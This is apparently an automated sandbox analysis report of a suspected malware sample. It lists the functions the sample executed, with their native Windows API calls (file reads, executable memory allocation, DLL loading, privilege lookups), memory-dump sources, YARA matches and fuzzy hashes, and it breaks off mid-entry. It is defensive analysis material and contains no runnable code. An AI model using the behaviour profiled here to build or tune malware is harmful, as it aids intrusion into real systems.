LdrLoadDll 99374->99376 99380 1182ca0 LdrInitializeThunk 99375->99380 99376->99375 99377 40cf8f 99377->99367 99379 41a810 LdrLoadDll 99377->99379 99379->99371 99380->99377 99382 41af60 LdrLoadDll 99381->99382 99383 41a59c 99382->99383 99386 1182f90 LdrInitializeThunk 99383->99386 99384 419bc9 99384->99341 99384->99343 99386->99384 99388 408328 99387->99388 99389 40acf0 LdrLoadDll 99388->99389 99390 408343 99389->99390 99391 414e50 LdrLoadDll 99390->99391 99392 408353 99391->99392 99393 40835c PostThreadMessageW 99392->99393 99394 408370 99392->99394 99393->99394 99394->99314 99396 40f683 99395->99396 99402 419e90 99396->99402 99400 41af60 LdrLoadDll 99399->99400 99401 419d6c 99399->99401 99400->99401 99401->99322 99403 419eac 99402->99403 99404 41af60 LdrLoadDll 99402->99404 99407 1182dd0 LdrInitializeThunk 99403->99407 99404->99403 99405 40f6ae 99405->99314 99407->99405 99408->99245 99410 41af60 LdrLoadDll 99409->99410 99411 419fdc 99410->99411 99414 1182f30 LdrInitializeThunk 99411->99414 99412 40f4fe 99412->99251 99412->99252 99414->99412 99415->99257 99416->99262 99417->99267 99419 1182ad0 LdrInitializeThunk

                                                    Executed Functions

                                                    Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 41a410-41a426 1 41a42c-41a459 NtReadFile 0->1 2 41a427 call 41af60 0->2 2->1
                                                    APIs
                                                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: 1JA$rMA$rMA
                                                    • API String ID: 2738559852-782607585
                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                    • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                    Function 0041A40E Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 3 41a40e-41a459 call 41af60 NtReadFile
                                                    APIs
                                                    • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID: 1JA$rMA$rMA
                                                    • API String ID: 2738559852-782607585
                                                    • Opcode ID: 82d684a64c6caecd14d81af05a65232a39f19b95b4c11cc6aeb29fb42846e935
                                                    • Instruction ID: 7b87a2adbf5bb1892d68d0bc153a876819ddc7eeaa9824eb43eaacbcb118f6b4
                                                    • Opcode Fuzzy Hash: 82d684a64c6caecd14d81af05a65232a39f19b95b4c11cc6aeb29fb42846e935
                                                    • Instruction Fuzzy Hash: 66F03AB6200049ABCB04DF98D890CEB77ADFF8C314B15874DFE1C93202C634E8558BA0
                                                    Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 219 40acf0-40ad19 call 41cc50 222 40ad1b-40ad1e 219->222 223 40ad1f-40ad2d call 41d070 219->223 226 40ad3d-40ad4e call 41b4a0 223->226 227 40ad2f-40ad3a call 41d2f0 223->227 232 40ad50-40ad64 LdrLoadDll 226->232 233 40ad67-40ad6a 226->233 227->226 232->233
                                                    APIs
                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                    • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                    • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                    Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 234 41a360-41a3b1 call 41af60 NtCreateFile
                                                    APIs
                                                    • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                    • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                    Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 237 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                    • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                    • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                    Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 256 41a490-41a4b9 call 41af60 NtClose
                                                    APIs
                                                    • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                    • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                    • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                    Function 01182B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8a2e7e64036b59a2465e4c7ee0ea99f8fecabc2bee7d13a3fa11560797e9bfb7
                                                    • Instruction ID: 01dda8826b5a7a105dd8d46dcc220c820ef534b7643bc5fcae3cb943bea3f17b
                                                    • Opcode Fuzzy Hash: 8a2e7e64036b59a2465e4c7ee0ea99f8fecabc2bee7d13a3fa11560797e9bfb7
                                                    • Instruction Fuzzy Hash: CE90026160240403460971584514616400A97E1201B55C021E1119590DC62989916229
                                                    Function 01182BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: f676adcd1fe981212841d48a1039df75942bd298f3fab61067c64a18f7fd18bd
                                                    • Instruction ID: bc8b1d31415c270d062fecd43da47f3ceaba6493430fe8c5a9cf4da25841cea9
                                                    • Opcode Fuzzy Hash: f676adcd1fe981212841d48a1039df75942bd298f3fab61067c64a18f7fd18bd
                                                    • Instruction Fuzzy Hash: 9C90023160140C02D6847158450464A000597D2301F95C015A012A654DCB198B5977A5
                                                    Function 01182AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c60316cfdb0dba16e5e356d65ada04ce5ab40c31d6975e939bcbe5f61f27c14e
                                                    • Instruction ID: e158bec955d9ffeb5cde8fba6b17e085d8bd2b05d00d5ae4d47a31d98527bc9e
                                                    • Opcode Fuzzy Hash: c60316cfdb0dba16e5e356d65ada04ce5ab40c31d6975e939bcbe5f61f27c14e
                                                    • Instruction Fuzzy Hash: 4290043571140403070DF55C07045070047D7D7351355C031F111F550CD735CD715335
                                                    Function 01182D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: bb2ec34d173cf1ca56ac8c63b0e408801b040a45466e8dbd854b0dc241e82cb5
                                                    • Instruction ID: 370906c9048ad11ccbe7420747490d2bea18d30c22147759ccfa6b7d72e45815
                                                    • Opcode Fuzzy Hash: bb2ec34d173cf1ca56ac8c63b0e408801b040a45466e8dbd854b0dc241e82cb5
                                                    • Instruction Fuzzy Hash: 0A90022961340402D6847158550860A000597D2202F95D415A011A558CCA1989695325
                                                    Function 01182D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9732fc6dd5f36e578f73cef31012c52a55cf542686bfd5d9a5215b53a49d158f
                                                    • Instruction ID: c75c481db7fe565689b7cac14c99a51aaa6dbd3ec15640884cbd66436cfb0ffb
                                                    • Opcode Fuzzy Hash: 9732fc6dd5f36e578f73cef31012c52a55cf542686bfd5d9a5215b53a49d158f
                                                    • Instruction Fuzzy Hash: F790022170140403D644715855186064005E7E2301F55D011E0519554CDA1989565326
                                                    Function 01182DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: ce7deca891ca6605d058b048600df5f141254dd76af93c85f40a4adca1720021
                                                    • Instruction ID: 94f769341c5831d9a3811a80abb5c2a9601c4d6a61f1eaef06bf416dee4396f4
                                                    • Opcode Fuzzy Hash: ce7deca891ca6605d058b048600df5f141254dd76af93c85f40a4adca1720021
                                                    • Instruction Fuzzy Hash: A8900221642445525A49B15845045074006A7E1241795C012A1519950CC62A9956D725
                                                    Function 01182DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
                                                    • Instruction ID: c0c5458101673816b02ba26aa5e1acba579bbf911d0bf756699f354be363f8c4
                                                    • Opcode Fuzzy Hash: 64219fee77333a259f408d763f81a0787eccba63899a90f91f6c0b869c75a0c2
                                                    • Instruction Fuzzy Hash: C790023160140813D61571584604707000997D1241F95C412A0529558DD75A8A52A225
                                                    Function 01182C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4a2f198333afbaac0c0dd9239819dcd55ad63414a4a78a3e43f1e4f4d2194b14
                                                    • Instruction ID: 30689f61dd810cf3603ead9ca9d9ed3fd1d02fd747140383557d48c4b58b9aa8
                                                    • Opcode Fuzzy Hash: 4a2f198333afbaac0c0dd9239819dcd55ad63414a4a78a3e43f1e4f4d2194b14
                                                    • Instruction Fuzzy Hash: 1290023160148C02D6147158850474A000597D1301F59C411A4529658DC79989917225
                                                    Function 01182CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: fb240bde9ed90e96c9dc7c012e9d834eedda635790144a2134d35ba761e3bee7
                                                    • Instruction ID: 518b6a0ee20492b08b29681ac14940f96db0b4d9d48e427d934c02ae50a52979
                                                    • Opcode Fuzzy Hash: fb240bde9ed90e96c9dc7c012e9d834eedda635790144a2134d35ba761e3bee7
                                                    • Instruction Fuzzy Hash: 0890023160140802D60475985508646000597E1301F55D011A5129555EC76989916235
                                                    Function 01182F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 6ee4f93be9e47da0dc2491d946e756ac87a346bad430156dc8552c464ab61896
                                                    • Instruction ID: e1216458d1a49d6a927dcee3e75171f97e8e3b3de3ed3e025c820326db46f133
                                                    • Opcode Fuzzy Hash: 6ee4f93be9e47da0dc2491d946e756ac87a346bad430156dc8552c464ab61896
                                                    • Instruction Fuzzy Hash: AA90026174140842D60471584514B060005D7E2301F55C015E1169554DC71DCD52622A
                                                    Function 01182F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e6286749a96113080ab40f3d8fccbecd4412f40ad2075fd48cf0b34c5848c49c
                                                    • Instruction ID: dd4a540615650f48a55dc8989d45d27bb0b6881ee37e244c25f19aa10c90a4cf
                                                    • Opcode Fuzzy Hash: e6286749a96113080ab40f3d8fccbecd4412f40ad2075fd48cf0b34c5848c49c
                                                    • Instruction Fuzzy Hash: 4F90023160180802D6047158491470B000597D1302F55C011A1269555DC72989516675
                                                    Function 01182FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 17b067ebfc1ff0c82ee1f2fd4a96d59f5421bd96f715f8de755b2750e1ee5856
                                                    • Instruction ID: 69d8a2ffdeaa1bcb67944dc896138187a1fd1b0737d862991da3817e3b0f479e
                                                    • Opcode Fuzzy Hash: 17b067ebfc1ff0c82ee1f2fd4a96d59f5421bd96f715f8de755b2750e1ee5856
                                                    • Instruction Fuzzy Hash: 15900221A01404424644716889449064005BBE2211755C121A0A9D550DC65D89655769
                                                    Function 01182FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9ccf6820bc791eb4c19c81bf9358e0676ad81e70115f80128b5a85eb4300ad61
                                                    • Instruction ID: e867fbb3a4a5184c96a89b2cdc994db672448cc562f692af3603871d06bbc21e
                                                    • Opcode Fuzzy Hash: 9ccf6820bc791eb4c19c81bf9358e0676ad81e70115f80128b5a85eb4300ad61
                                                    • Instruction Fuzzy Hash: 3C900221611C0442D70475684D14B07000597D1303F55C115A0259554CCA1989615625
                                                    Function 01182E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b4a041419d6dce3baec6977bb455e7038ea9f85dabc5c6c71c7d32e66c83b21b
                                                    • Instruction ID: cb651da98e07eedd0241bfcb490bcdbe35d84f9f85b864cf347515f5da31ca76
                                                    • Opcode Fuzzy Hash: b4a041419d6dce3baec6977bb455e7038ea9f85dabc5c6c71c7d32e66c83b21b
                                                    • Instruction Fuzzy Hash: AB900221A0140902D60571584504616000A97D1241F95C022A1129555ECB298A92A235
                                                    Function 01182EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2051357395.0000000001110000.00000040.00001000.00020000.00000000.sdmp, Offset: 01110000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_1110000_hOe2JrpIAE.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 73713b93f95b1d5f9e70dfe3d2a43096999e9499caadf2496a8663356c6d257f
                                                    • Instruction ID: 47f17c1ae86bb56e47403ad48151dfc03b7700efff5da5f23c8d3d21bfc1b801
                                                    • Opcode Fuzzy Hash: 73713b93f95b1d5f9e70dfe3d2a43096999e9499caadf2496a8663356c6d257f
                                                    • Instruction Fuzzy Hash: 6290027160140802D64471584504746000597D1301F55C011A5169554EC75D8ED56769
                                                    Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                    • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                    • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                    • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                    Function 0041A630 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 6 41a630-41a661 call 41af60 RtlAllocateHeap
                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID: 6EA
                                                    • API String ID: 1279760036-1400015478
                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                    • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                    Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 204 408310-40835a call 41be60 call 41ca00 call 40acf0 call 414e50 213 40835c-40836e PostThreadMessageW 204->213 214 40838e-408392 204->214 215 408370-40838a call 40a480 213->215 216 40838d 213->216 215->216 216->214
                                                    APIs
                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: MessagePostThread
                                                    • String ID:
                                                    • API String ID: 1836367815-0
                                                    • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                    • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                    • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                    • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                    Function 0041A7C1 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 240 41a7c1-41a7ea call 41af60 242 41a7ef-41a804 LookupPrivilegeValueW 240->242
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2050328168.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_400000_hOe2JrpIAE.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: bc8ed5411a357cdbc73fc6225cbb22060938e7837050913796bd82941ac21636
                                                    • Instruction ID: 8dc17872df97591ae68a0353c81d9f7144f39d9ad21942d3304e6be5dbe02fc6
                                                    • Opcode Fuzzy Hash: bc8ed5411a357cdbc73fc6225cbb22060938e7837050913796bd82941ac21636
                                                    • Instruction Fuzzy Hash: DBE06DB12002046BDB20EF54CC45EE73369EF88750F208469F91C57241D634E851CBA5
                                                    Function 0041A66B Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 243 41a66b-41a687 call 41af60 246 41a68c-41a6a1 RtlFreeHeap 243->246
                                                    APIs
                                                    • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                    Memory Dump Source
